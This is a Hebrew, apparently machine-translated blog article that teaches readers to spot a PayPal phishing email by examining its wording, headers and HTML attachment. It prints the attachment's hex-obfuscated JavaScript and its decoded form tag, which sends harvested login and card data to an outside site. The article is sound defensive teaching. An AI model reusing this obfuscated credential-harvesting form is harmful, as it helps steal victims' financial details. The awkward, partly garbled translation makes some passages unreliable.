10Sep

אבטחה מקוונת: לשבור את האנטומיה של דוא"ל התחזות


בעולם של היום שבו המידע של כולם הוא מקוון, התחזות היא אחת ההתקפות המקוונות הפופולאריות והרסניות ביותר, כי אתה תמיד יכול לנקות וירוס, אבל אם הפרטים הבנקאיים שלך נגנבים, אתה בצרות.הנה פירוט של התקפה כזו שקיבלנו.

אל תחשוב שזה רק הפרטים הבנקאיים שלך החשובים: אחרי הכל, אם מישהו מרוויח שליטה על הכניסה לחשבון שלך הם לא רק יודעים את המידע הכלול בחשבון זה, אבל הסיכויים הם כי פרטי כניסה זהה ניתן להשתמש על שוניםחשבונות אחרים.ואם הם מתפשרים על חשבון הדוא"ל שלך, הם יכולים לאפס את כל הסיסמאות האחרות.

אז בנוסף לשמירת סיסמאות חזקות ומשתנות, אתה צריך תמיד להיות על המשמר של הודעות דוא"ל מזויפות התחזות כמו הדבר האמיתי.בעוד שרוב ניסיונות התחזות הם חובבים, חלקם משכנעים למדי ולכן חשוב להבין כיצד לזהות אותם על פני השטח, כמו גם איך הם עובדים מתחת למכסה המנוע.

Image by asirap

בחינת מה שנמצא בתצוגה פשוטה

דוגמה לדוא"ל שלנו, כמו רוב ניסיונות ההתחזות, "מודיעה" לך על הפעילות בחשבון PayPal שלך, אשר, בנסיבות רגילות, תהיה מדאיגה.אז קריאה לפעולה היא לאמת / לשחזר את החשבון שלך על ידי הגשת כמעט כל פיסת מידע אישי אתה יכול לחשוב.שוב, זה די נוסחלי.

אמנם יש בהחלט יוצאים מן הכלל, כמעט כל פישינג דואר זבל הונאה נטען עם דגלים אדומים ישירות בהודעה עצמם.גם אם הטקסט הוא משכנע, אתה יכול בדרך כלל למצוא טעויות רבות littered ברחבי הגוף הודעה המציינים את ההודעה אינה לגיטימית.

גוף ההודעה

במבט ראשון, זהו אחד מכתבי ההתחזות הטובים יותר שראיתי.אין שגיאות כתיב או דקדוק, והקריאה נקראת לפי מה שאפשר לצפות.עם זאת, ישנם כמה דגלים אדומים ניתן לראות כאשר אתה בוחן את התוכן קצת יותר מקרוב.

  • "Paypal" - המקרה הנכון הוא "PayPal"( הון P).תוכל לראות שתי הווריאציות משמשות בהודעה.חברות מאוד מכוונת עם המיתוג שלהם, ולכן ספק אם משהו כזה יעבור את תהליך ההגהה.
  • "לאפשר ActiveX" - כמה פעמים ראית אינטרנט לגיטימי מבוסס העסק בגודל של Paypal להשתמש ברכוש קנייני אשר עובד רק על דפדפן אחד, במיוחד כאשר הם תומכים דפדפנים מרובים?בטח, איפשהו שם חברה עושה את זה, אבל זה דגל אדום.
  • "מאובטח". - שים לב איך מילה זו אינה בשורה בשוליים עם שאר הטקסט פסקה.גם אם אני מותח את החלון קצת יותר, זה לא לעטוף או שטח נכון.
  • "Paypal!" - הרווח לפני סימן הקריאה נראה מביך.רק עוד quirk שבו אני בטוח לא יהיה דוא"ל לגיטימי.
  • "PayPal - עדכון חשבון Form.pdf.htm" - מדוע PayPal לצרף "PDF" במיוחד כאשר הם יכולים רק קישור לדף באתר שלהם?בנוסף, מדוע ינסו להסוות קובץ HTML כקובץ PDF?זהו הדגל האדום הגדול מכולם.

כותרת ההודעה

כאשר תסתכל על כותרת ההודעה, יופיעו כמה דגלים אדומים נוספים:

  • הכתובת מהכתובת [email protected].
  • הכתובת חסרה.אני לא ריק את זה, זה פשוט לא חלק כותרת ההודעה הרגילה.בדרך כלל חברה שיש לה את השם שלך יהיה אישית את הדוא"ל לך.

הקובץ המצורף

כשאני פותח את הקובץ המצורף, אתה יכול לראות מיד את הפריסה אינה נכונה שכן הוא חסר מידע בסגנון.שוב, למה PayPal דוא"ל טופס HTML כאשר הם יכולים פשוט לתת לך קישור באתר שלהם?

הערה: השתמשנו ב- Gmail המובנה ב- Gmail מצורף הצופה עבור זה, אבל אנחנו ממליצים לא לפתוח קבצים מצורפים מ scammers.לעולם לא.אֵיִ פַּעַם.הם לעתים קרובות מכילים מנצל כי יתקין סוסים טרויאניים במחשב לגנוב את פרטי החשבון שלך.

גלילה למטה קצת יותר אתה יכול לראות כי טופס זה מבקש לא רק עבור פרטי הכניסה PayPal שלנו, אבל עבור הבנקאות ומידע כרטיס האשראי גם כן.חלק מהתמונות שבורות.

ברור כי זה ניסיון דיוג הולך אחרי הכל עם אחד.

התפלגות טכנית

למרות שזה צריך להיות די ברור על סמך מה שנראה לעין כי זה ניסיון התחזות, עכשיו אנחנו הולכים לשבור את האיפור הטכני של הדוא"ל ולראות מה אנחנו יכולים למצוא.

מידע מתוך הקובץ המצורף

הדבר הראשון הוא להסתכל על מקור ה- HTML של טופס המצורף אשר הוא שולח את הנתונים לאתר מזויף.כאשר צופה במהירות את המקור, כל הקישורים מופיעים תקף כפי שהם מצביעים על "paypal.com" או "paypalobjects.com" אשר הן חוקי.

עכשיו אנחנו הולכים להעיף מבט על כמה מידע בסיסי בדף Firefox אוספת על הדף.

כפי שאתה יכול לראות, חלק הגרפיקה הם משכו מן התחומים "blessedtobe.com", "goodhealthpharmacy.com" ו "pic-upload.de" במקום תחומים PayPal לגיטימי.

מידע מכותרות הדוא"ל

הבא נסקור את כותרות הודעות הדוא"ל הגולמיות.Gmail הופך את זה לזמין באמצעות האפשרות Show Original בתפריט.

מחפש את המידע הכותרת עבור ההודעה המקורית, אתה יכול לראות את ההודעה הזו היתה מורכבת באמצעות Outlook Express 6. אני בספק יש PayPal יש מישהו על צוות אשר שולח כל ההודעות הללו באופן ידני באמצעות לקוח הדוא"ל המיושן.

עכשיו מסתכלים על מידע ניתוב, אנו יכולים לראות את כתובת ה- IP של השולח ואת שרת הדואר ממסר.

כתובת ה- IP "User" היא השולח המקורי.ביצוע בדיקה מהירה על מידע ה- IP, אנו יכולים לראות את ה- IP השולח הוא בגרמניה.

וכאשר אנו מסתכלים על שרת הדואר relaying( mail.itak.at), כתובת ה- IP אנו יכולים לראות זה ISP מבוסס באוסטריה.אני מסופקת PayPal מסלולים הדוא"ל שלהם ישירות דרך ספק שירותי אינטרנט באוסטריה כאשר יש להם חוות שרת מסיבי אשר יכול בקלות להתמודד עם משימה זו.

לאן הנתונים הולכים?

אז קבענו בבירור שזה דוא"ל התחזות ואספנו כמה מידע על מקור ההודעה, אבל מה לגבי הנתונים שנשלחו?

כדי לראות זאת, עלינו תחילה לשמור את הקובץ המצורף HTM לעשות שולחן העבודה שלנו לפתוח בעורך טקסט.גלילה דרכה, הכל נראה בסדר, אלא כאשר אנו מגיעים לחסום Javascript נראית חשודה.

לשבור את המקור המלא של הבלוק האחרון של Javascript, אנו רואים:

& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =" 3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; y ="; עבור( i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;

בכל פעם שאתה רואה מחרוזת גדולה של מספרים ומספרים אקראיים לכאורה המוטבעים בבלוק Javascript, זה בדרך כלל משהו חשוד.כאשר מסתכלים על הקוד, המשתנה "x" מוגדר למחרוזת גדולה זו ולאחר מכן מפוענח למשתנה "y".התוצאה הסופית של משתנה "y" נכתבת לאחר מכן למסמך כ- HTML.

מאז המחרוזת הגדולה עשוי מספרים 0-9 והאותיות AF, שהיא מקודדות ככל הנראה באמצעות ASCII פשוט מרת Hex:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

מתורגם ל:

& lt; טופס name =" main" id =" main"method = "post" action = "http: //www.dexposure.net/bbs/data/ Verified.php" & gt;

זה לא צירוף מקרים כי זה מפענח לתוך תג HTML טופס חוקי אשר שולח את התוצאות לא PayPal, אלא לאתר סוררים.

בנוסף, בעת הצגת מקור ה- HTML של הטופס, תראה שתג טופס זה אינו גלוי משום שהוא נוצר באופן דינמי דרך ה- Javascript.זוהי דרך חכמה להסתיר מה HTML עושה בפועל אם מישהו היה פשוט להציג את המקור שנוצר של הקובץ המצורף( כפי שעשינו קודם לכן) לעומת פתיחת הקובץ המצורף ישירות עורך טקסט.

הפעלת whois מהירה על האתר הפוגע, אנו יכולים לראות את זה הוא תחום אירוח מתארח אינטרנט פופולרי, 1and1.

מה בולט הוא תחום משתמש שם קריא( בניגוד למשהו כמו "dfh3sjhskjhw.net") ואת התחום נרשם במשך 4 שנים.בגלל זה, אני מאמין שהדומיין הזה נחטף והשתמש בו כחייל בניסיון ההתנסות.

ציניות היא הגנה טובה

כשמדובר להישאר באינטרנט בטוח, זה לא כואב יש קצת ציניות.

בזמן שאני בטוח שיש יותר דגלים אדומים בדוא"ל לדוגמה, מה שציינו לעיל הם אינדיקטורים שראינו לאחר דקות ספורות של בדיקה.באופן היפותטי, אם רמת פני השטח של הדוא"ל לחקות את מקבילה לגיטימית 100%, ניתוח טכני עדיין לחשוף את טבעו האמיתי.זה למה זה ייבוא ​​כדי להיות מסוגל לבחון הן את מה שאתה יכול ולא יכול לראות.